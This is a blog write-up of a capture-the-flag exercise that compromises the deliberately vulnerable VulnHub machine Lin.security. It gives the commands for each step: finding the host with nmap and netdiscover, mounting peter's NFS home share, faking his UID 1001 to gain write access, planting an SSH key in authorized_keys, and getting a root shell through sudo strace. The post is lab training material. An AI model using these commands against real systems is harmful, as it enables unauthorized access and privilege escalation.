Lin.security is an insecure box found on vulnhub. It can be downloaded at the following link: Lin.Security: 1 ~ VulnHub. Today I will show you how to pwn the peter account.
This is my first writeup, and the first machine I was able to pwn without looking at any guides.
Difficulty Level:
Lin.security is a very insecure VM. There are multiple routes to gain root access, but today we will look at this through one of the more difficult routes, through the user Peter.
Enumerating the machine:
A common and easy way to find the IP address of the vulnerable machine:
nmap -sn <your machine ip>/CIDR blockor
netdiscover -r <your machine ip>/CIDR blockMy Kali VM has an IP addr of 192.168.0.7/24, so I used:
netdiscover -r 192.168.0.7/24
Let’s check out the 192.168.0.18 machine.
Since we’re working on a vulnhub box and we don’t care about how loud our scans are, let’s do a quick and aggressive scan.
nmap -T5 - min-rate 5000 -sV -O -p- 192.168.0.18Press enter or click to view image in full size
We find that the SSH port (22) and some NFS ports are open. Network File System is similar to SMB in the way that it is simply a way to share files. Let’s see if we can mount any of these shares onto our machine.
showmount -e 192.168.0.18And yes, we do get a result:
/home/peter *
Mounting:
Get Seido Karasaki’s stories in your inbox
Join Medium for free to get updates from this writer.
Now let’s mount this share and see what we can find. First we have to make a directory to mount it on. Let’s make it in tmp and call it nfs.
mkdir /tmp/nfsTo mount:
sudo mount -t nfs 192.168.0.18:/home/peter /tmp/nfsNow when we change directories to /tmp/nfs, it looks like nothing is there… but let’s list all hidden files through:
ls -la
We can see that we cannot access some files, and after some poking around, we will quickly realize that we do not have read/write access. What is interesting, however, is the UID or User ID of Peter, which is 1001. What happens if we create a user with the same UID?
sudo adduser --uid 1001 <username>The Pwn:
We now have read/write access to this share. Now what can we do from the home directory? Usually, something good to check for would be the .ssh file, but there isn’t one… so let’s make one.
mkdir .sshCan we authorize ourselves by copying our public ssh key into the authorized_keys file? Please make sure you are in the .ssh directory before running these commands.
touch authorized_keyscat ~/.ssh/id_rsa.pub >> authorized_keysNow let’s try logging onto Peter’s account via ssh…
ssh peter@192.168.0.18Bingo. We’re in. Let’s use sudo -l to see if Peter has any sudo privileges.
sudo -lWe find that Peter can run strace as sudo, and when cross-referenced at GTFOBins, we find this line:
sudo strace -o /dev/null /bin/shPress enter or click to view image in full size
Hooray! We have root access!